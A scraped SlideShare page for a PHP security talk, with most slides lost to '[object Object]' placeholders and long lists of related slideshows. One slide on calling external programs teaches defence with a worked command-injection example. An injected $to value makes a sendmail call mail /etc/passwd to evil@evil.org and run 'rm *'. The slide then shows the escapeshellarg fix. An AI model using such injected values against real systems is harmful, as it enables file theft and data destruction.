SlideShare uma empresa Scribd logo

Php Security

Transferir como PPT, PDF
Amit Kumar Singh
Amit Kumar Singh

presentation given by uttam in PHPCamp

Tecnologia
1 de 12
PHP Security by Uttam Kumar Email:- [email_address] Mobile:- 9730791715
What is Security? ,[object Object],[object Object],[object Object]
Secure Web Applications ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
PHP & Security ,[object Object],[object Object]
Never trust the web… ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Never trust the web… ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
XSS attack ,[object Object],[object Object],[object Object],[object Object]
XSS attack ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
SQL Injection WWW ,[object Object],[object Object],[object Object],[object Object],[object Object]
Calling External Programs Sometimes you need to call external programs (using system( ), exec( ), popen( ), passthru( ), or the back-tick operator), this is extreemly dangerous if the program name or any of its arguments are based on user input. Instead use escapeshellarg( ) or escapeshellcmd( ) so that users can’t trick the system into executing arbitrary commands. <?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?> The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A which would result in running the command: /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm * a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);
Questions…????
Thank You !!

Recomendados

PHP
PHP PHP
PHP webhostingguy
 
Slides
SlidesSlides
Slidesvti
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Http and security
Http and securityHttp and security
Http and securityNikola Milosevic
 
Php session 3 Important topics
Php session 3 Important topicsPhp session 3 Important topics
Php session 3 Important topicsSpy Seat
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
PHP Security
PHP SecurityPHP Security
PHP Securitymanugoel2003
 
My_sql_with_php
My_sql_with_phpMy_sql_with_php
My_sql_with_phpIshaq Shinwari
 

Recomendados

PHP
PHP PHP
PHP webhostingguy
 
Slides
SlidesSlides
Slidesvti
 
Security In PHP Applications
Security In PHP ApplicationsSecurity In PHP Applications
Security In PHP ApplicationsAditya Mooley
 
Http and security
Http and securityHttp and security
Http and securityNikola Milosevic
 
Php session 3 Important topics
Php session 3 Important topicsPhp session 3 Important topics
Php session 3 Important topicsSpy Seat
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
PHP Security
PHP SecurityPHP Security
PHP Securitymanugoel2003
 
My_sql_with_php
My_sql_with_phpMy_sql_with_php
My_sql_with_phpIshaq Shinwari
 
Пингвины из калининграда
Пингвины из калининградаПингвины из калининграда
Пингвины из калининградаAndrew Yashenko
 
Введение в веб-проектирование
Введение в веб-проектированиеВведение в веб-проектирование
Введение в веб-проектированиеMaryia Davidouskaia
 
Custom Post Type and Taxonomies in WordPress 3.x
Custom Post Type and Taxonomies in WordPress 3.xCustom Post Type and Taxonomies in WordPress 3.x
Custom Post Type and Taxonomies in WordPress 3.xAmit Kumar Singh
 
Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"
Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"
Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"Yandex
 
Organisation and navigation
Organisation and navigationOrganisation and navigation
Organisation and navigationLon Barfield
 
Тестирование требований
Тестирование требованийТестирование требований
Тестирование требованийISsoft
 
Bdd and dsl как способ построения коммуникации на проекте
Bdd and dsl как способ построения коммуникации на проектеBdd and dsl как способ построения коммуникации на проекте
Bdd and dsl как способ построения коммуникации на проектеISsoft
 
Using Flexbox Today (Generate Sydney 2016)
Using Flexbox Today (Generate Sydney 2016)Using Flexbox Today (Generate Sydney 2016)
Using Flexbox Today (Generate Sydney 2016)Zoe Gillenwater
 
How Joomla Works
How Joomla WorksHow Joomla Works
How Joomla WorksAmit Kumar Singh
 
CSS Lessons Learned the Hard Way (Generate Conf)
CSS Lessons Learned the Hard Way (Generate Conf)CSS Lessons Learned the Hard Way (Generate Conf)
CSS Lessons Learned the Hard Way (Generate Conf)Zoe Gillenwater
 
6. таблицы и другие теги html
6. таблицы и другие теги html6. таблицы и другие теги html
6. таблицы и другие теги htmlSergei Dubrov
 
Joomla Request To Response
Joomla Request To ResponseJoomla Request To Response
Joomla Request To ResponseAmit Kumar Singh
 
Верстка_Лекция1
Верстка_Лекция1Верстка_Лекция1
Верстка_Лекция1itc73
 
Box Model
Box ModelBox Model
Box ModelAmit Kumar Singh
 
Show vs. Tell in UX Design (Front in Amsterdam)
Show vs. Tell in UX Design (Front in Amsterdam)Show vs. Tell in UX Design (Front in Amsterdam)
Show vs. Tell in UX Design (Front in Amsterdam)Zoe Gillenwater
 
Uwe usability evaluation
Uwe usability evaluationUwe usability evaluation
Uwe usability evaluationLon Barfield
 
CSS Lessons Learned the Hard Way (ConvergeSE)
CSS Lessons Learned the Hard Way (ConvergeSE)CSS Lessons Learned the Hard Way (ConvergeSE)
CSS Lessons Learned the Hard Way (ConvergeSE)Zoe Gillenwater
 
решение основной проблемы Agile (scrum) проектов в контексте ba
решение основной проблемы Agile (scrum) проектов в контексте baрешение основной проблемы Agile (scrum) проектов в контексте ba
решение основной проблемы Agile (scrum) проектов в контексте baISsoft
 
FL Blog Con 2015: How To Find The Best WordPress Plugins For You
FL Blog Con 2015: How To Find The Best WordPress Plugins For YouFL Blog Con 2015: How To Find The Best WordPress Plugins For You
FL Blog Con 2015: How To Find The Best WordPress Plugins For YouAdam Soucie
 
Css part2
Css part2Css part2
Css part2ISsoft
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
Php security3895
Php security3895Php security3895
Php security3895PrinceGuru MS
 

Mais conteúdo relacionado

Destaque

Пингвины из калининграда
Пингвины из калининградаПингвины из калининграда
Пингвины из калининградаAndrew Yashenko
 
Введение в веб-проектирование
Введение в веб-проектированиеВведение в веб-проектирование
Введение в веб-проектированиеMaryia Davidouskaia
 
Custom Post Type and Taxonomies in WordPress 3.x
Custom Post Type and Taxonomies in WordPress 3.xCustom Post Type and Taxonomies in WordPress 3.x
Custom Post Type and Taxonomies in WordPress 3.xAmit Kumar Singh
 
Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"
Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"
Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"Yandex
 
Organisation and navigation
Organisation and navigationOrganisation and navigation
Organisation and navigationLon Barfield
 
Тестирование требований
Тестирование требованийТестирование требований
Тестирование требованийISsoft
 
Bdd and dsl как способ построения коммуникации на проекте
Bdd and dsl как способ построения коммуникации на проектеBdd and dsl как способ построения коммуникации на проекте
Bdd and dsl как способ построения коммуникации на проектеISsoft
 
Using Flexbox Today (Generate Sydney 2016)
Using Flexbox Today (Generate Sydney 2016)Using Flexbox Today (Generate Sydney 2016)
Using Flexbox Today (Generate Sydney 2016)Zoe Gillenwater
 
CSS Lessons Learned the Hard Way (Generate Conf)
CSS Lessons Learned the Hard Way (Generate Conf)CSS Lessons Learned the Hard Way (Generate Conf)
CSS Lessons Learned the Hard Way (Generate Conf)Zoe Gillenwater
 
6. таблицы и другие теги html
6. таблицы и другие теги html6. таблицы и другие теги html
6. таблицы и другие теги htmlSergei Dubrov
 
Joomla Request To Response
Joomla Request To ResponseJoomla Request To Response
Joomla Request To ResponseAmit Kumar Singh
 
Верстка_Лекция1
Верстка_Лекция1Верстка_Лекция1
Верстка_Лекция1itc73
 
Show vs. Tell in UX Design (Front in Amsterdam)
Show vs. Tell in UX Design (Front in Amsterdam)Show vs. Tell in UX Design (Front in Amsterdam)
Show vs. Tell in UX Design (Front in Amsterdam)Zoe Gillenwater
 
Uwe usability evaluation
Uwe usability evaluationUwe usability evaluation
Uwe usability evaluationLon Barfield
 
CSS Lessons Learned the Hard Way (ConvergeSE)
CSS Lessons Learned the Hard Way (ConvergeSE)CSS Lessons Learned the Hard Way (ConvergeSE)
CSS Lessons Learned the Hard Way (ConvergeSE)Zoe Gillenwater
 
решение основной проблемы Agile (scrum) проектов в контексте ba
решение основной проблемы Agile (scrum) проектов в контексте baрешение основной проблемы Agile (scrum) проектов в контексте ba
решение основной проблемы Agile (scrum) проектов в контексте baISsoft
 
FL Blog Con 2015: How To Find The Best WordPress Plugins For You
FL Blog Con 2015: How To Find The Best WordPress Plugins For YouFL Blog Con 2015: How To Find The Best WordPress Plugins For You
FL Blog Con 2015: How To Find The Best WordPress Plugins For YouAdam Soucie
 
Css part2
Css part2Css part2
Css part2ISsoft
 

Destaque (20)

Пингвины из калининграда
Пингвины из калининградаПингвины из калининграда
Пингвины из калининграда
 
Введение в веб-проектирование
Введение в веб-проектированиеВведение в веб-проектирование
Введение в веб-проектирование
 
Custom Post Type and Taxonomies in WordPress 3.x
Custom Post Type and Taxonomies in WordPress 3.xCustom Post Type and Taxonomies in WordPress 3.x
Custom Post Type and Taxonomies in WordPress 3.x
 
Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"
Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"
Сергей Бережной "Про шаблонизаторы вообще и BEMHTML в частности"
 
Organisation and navigation
Organisation and navigationOrganisation and navigation
Organisation and navigation
 
Тестирование требований
Тестирование требованийТестирование требований
Тестирование требований
 
Bdd and dsl как способ построения коммуникации на проекте
Bdd and dsl как способ построения коммуникации на проектеBdd and dsl как способ построения коммуникации на проекте
Bdd and dsl как способ построения коммуникации на проекте
 
Using Flexbox Today (Generate Sydney 2016)
Using Flexbox Today (Generate Sydney 2016)Using Flexbox Today (Generate Sydney 2016)
Using Flexbox Today (Generate Sydney 2016)
 
How Joomla Works
How Joomla WorksHow Joomla Works
How Joomla Works
 
CSS Lessons Learned the Hard Way (Generate Conf)
CSS Lessons Learned the Hard Way (Generate Conf)CSS Lessons Learned the Hard Way (Generate Conf)
CSS Lessons Learned the Hard Way (Generate Conf)
 
6. таблицы и другие теги html
6. таблицы и другие теги html6. таблицы и другие теги html
6. таблицы и другие теги html
 
Joomla Request To Response
Joomla Request To ResponseJoomla Request To Response
Joomla Request To Response
 
Верстка_Лекция1
Верстка_Лекция1Верстка_Лекция1
Верстка_Лекция1
 
Box Model
Box ModelBox Model
Box Model
 
Show vs. Tell in UX Design (Front in Amsterdam)
Show vs. Tell in UX Design (Front in Amsterdam)Show vs. Tell in UX Design (Front in Amsterdam)
Show vs. Tell in UX Design (Front in Amsterdam)
 
Uwe usability evaluation
Uwe usability evaluationUwe usability evaluation
Uwe usability evaluation
 
CSS Lessons Learned the Hard Way (ConvergeSE)
CSS Lessons Learned the Hard Way (ConvergeSE)CSS Lessons Learned the Hard Way (ConvergeSE)
CSS Lessons Learned the Hard Way (ConvergeSE)
 
решение основной проблемы Agile (scrum) проектов в контексте ba
решение основной проблемы Agile (scrum) проектов в контексте baрешение основной проблемы Agile (scrum) проектов в контексте ba
решение основной проблемы Agile (scrum) проектов в контексте ba
 
FL Blog Con 2015: How To Find The Best WordPress Plugins For You
FL Blog Con 2015: How To Find The Best WordPress Plugins For YouFL Blog Con 2015: How To Find The Best WordPress Plugins For You
FL Blog Con 2015: How To Find The Best WordPress Plugins For You
 
Css part2
Css part2Css part2
Css part2
 

Semelhante a Php Security

Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure codingHaitham Raik
 
Php Security3895
Php Security3895Php Security3895
Php Security3895Aung Khant
 
Security: Odoo Code Hardening
Security: Odoo Code HardeningSecurity: Odoo Code Hardening
Security: Odoo Code HardeningOdoo
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionDaniel Owens
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10Sastry Tumuluri
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsAleksandr Yampolskiy
 
Web application security
Web application securityWeb application security
Web application securityRavi Raj
 
Application Security
Application SecurityApplication Security
Application Securityflorinc
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Indexwebhostingguy
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?ConFoo
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web SecurityChris Shiflett
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSecuRing
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...appsec
 

Semelhante a Php Security (20)

Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Php security3895
Php security3895Php security3895
Php security3895
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
Php Security3895
Php Security3895Php Security3895
Php Security3895
 
Security: Odoo Code Hardening
Security: Odoo Code HardeningSecurity: Odoo Code Hardening
Security: Odoo Code Hardening
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
Php security
Php securityPhp security
Php security
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 
Web application security
Web application securityWeb application security
Web application security
 
Application Security
Application SecurityApplication Security
Application Security
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index12-security.ppt - PHP and Arabic Language - Index
12-security.ppt - PHP and Arabic Language - Index
 
Security.ppt
Security.pptSecurity.ppt
Security.ppt
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...07 application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...
 

Mais de Amit Kumar Singh

Improving Core Web Vitals for WordPress
Improving Core Web Vitals for WordPressImproving Core Web Vitals for WordPress
Improving Core Web Vitals for WordPressAmit Kumar Singh
 
Getting started with WordPress Development
Getting started with WordPress DevelopmentGetting started with WordPress Development
Getting started with WordPress DevelopmentAmit Kumar Singh
 
Alternate Development Techniques on WordPress
Alternate Development Techniques on WordPressAlternate Development Techniques on WordPress
Alternate Development Techniques on WordPressAmit Kumar Singh
 
Building Minimal Viable Product (MVP) with WordPress
Building Minimal Viable Product (MVP) with WordPressBuilding Minimal Viable Product (MVP) with WordPress
Building Minimal Viable Product (MVP) with WordPressAmit Kumar Singh
 
Rapid Prototyping With WordPress
Rapid Prototyping With WordPressRapid Prototyping With WordPress
Rapid Prototyping With WordPressAmit Kumar Singh
 
Stop Coding; Start Assembling Your Websites
Stop Coding; Start Assembling Your WebsitesStop Coding; Start Assembling Your Websites
Stop Coding; Start Assembling Your WebsitesAmit Kumar Singh
 
WordPress as Rapid Prototyping Tool
WordPress as Rapid Prototyping ToolWordPress as Rapid Prototyping Tool
WordPress as Rapid Prototyping ToolAmit Kumar Singh
 
Leveraging your business with WordPress
Leveraging your business with WordPressLeveraging your business with WordPress
Leveraging your business with WordPressAmit Kumar Singh
 
WPoid : You Blog, We Take Care Of The Rest
WPoid : You Blog, We Take Care Of The RestWPoid : You Blog, We Take Care Of The Rest
WPoid : You Blog, We Take Care Of The RestAmit Kumar Singh
 
Joomla Day India 2009 Business Logic With The Mvc
Joomla Day India 2009 Business Logic With The MvcJoomla Day India 2009 Business Logic With The Mvc
Joomla Day India 2009 Business Logic With The MvcAmit Kumar Singh
 
Introduction to web services and how to in php
Introduction to web services and how to in phpIntroduction to web services and how to in php
Introduction to web services and how to in phpAmit Kumar Singh
 
Getting Started With Php Frameworks @BCP5
Getting Started With Php Frameworks @BCP5Getting Started With Php Frameworks @BCP5
Getting Started With Php Frameworks @BCP5Amit Kumar Singh
 
Joomla @ Barcamp4(Feb 08 Pune)
Joomla @ Barcamp4(Feb 08 Pune)Joomla @ Barcamp4(Feb 08 Pune)
Joomla @ Barcamp4(Feb 08 Pune)Amit Kumar Singh
 

Mais de Amit Kumar Singh (20)

Improving Core Web Vitals for WordPress
Improving Core Web Vitals for WordPressImproving Core Web Vitals for WordPress
Improving Core Web Vitals for WordPress
 
Getting started with WordPress Development
Getting started with WordPress DevelopmentGetting started with WordPress Development
Getting started with WordPress Development
 
Alternate Development Techniques on WordPress
Alternate Development Techniques on WordPressAlternate Development Techniques on WordPress
Alternate Development Techniques on WordPress
 
Building Minimal Viable Product (MVP) with WordPress
Building Minimal Viable Product (MVP) with WordPressBuilding Minimal Viable Product (MVP) with WordPress
Building Minimal Viable Product (MVP) with WordPress
 
Rapid Prototyping With WordPress
Rapid Prototyping With WordPressRapid Prototyping With WordPress
Rapid Prototyping With WordPress
 
Stop Coding; Start Assembling Your Websites
Stop Coding; Start Assembling Your WebsitesStop Coding; Start Assembling Your Websites
Stop Coding; Start Assembling Your Websites
 
WordPress as Rapid Prototyping Tool
WordPress as Rapid Prototyping ToolWordPress as Rapid Prototyping Tool
WordPress as Rapid Prototyping Tool
 
WordPress Use Cases
WordPress Use CasesWordPress Use Cases
WordPress Use Cases
 
Leveraging your business with WordPress
Leveraging your business with WordPressLeveraging your business with WordPress
Leveraging your business with WordPress
 
Maharashtra at a glance
Maharashtra at a glanceMaharashtra at a glance
Maharashtra at a glance
 
WPoid : You Blog, We Take Care Of The Rest
WPoid : You Blog, We Take Care Of The RestWPoid : You Blog, We Take Care Of The Rest
WPoid : You Blog, We Take Care Of The Rest
 
Joomla Day India 2009 Business Logic With The Mvc
Joomla Day India 2009 Business Logic With The MvcJoomla Day India 2009 Business Logic With The Mvc
Joomla Day India 2009 Business Logic With The Mvc
 
Introduction to web services and how to in php
Introduction to web services and how to in phpIntroduction to web services and how to in php
Introduction to web services and how to in php
 
Getting Started With Php Frameworks @BCP5
Getting Started With Php Frameworks @BCP5Getting Started With Php Frameworks @BCP5
Getting Started With Php Frameworks @BCP5
 
Open Social Phpcamp
Open Social PhpcampOpen Social Phpcamp
Open Social Phpcamp
 
Overview Of Drupal
Overview Of DrupalOverview Of Drupal
Overview Of Drupal
 
PHP tips by a MYSQL DBA
PHP tips by a MYSQL DBAPHP tips by a MYSQL DBA
PHP tips by a MYSQL DBA
 
Joomla @ Barcamp4(Feb 08 Pune)
Joomla @ Barcamp4(Feb 08 Pune)Joomla @ Barcamp4(Feb 08 Pune)
Joomla @ Barcamp4(Feb 08 Pune)
 
Tables And SQL basics
Tables And SQL basicsTables And SQL basics
Tables And SQL basics
 
JQuery: Introduction
JQuery: IntroductionJQuery: Introduction
JQuery: Introduction
 

Último

New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 

Último (20)

New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 

Php Security

  • 1. PHP Security by Uttam Kumar Email:- [email_address] Mobile:- 9730791715
  • 2.
  • 3.
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
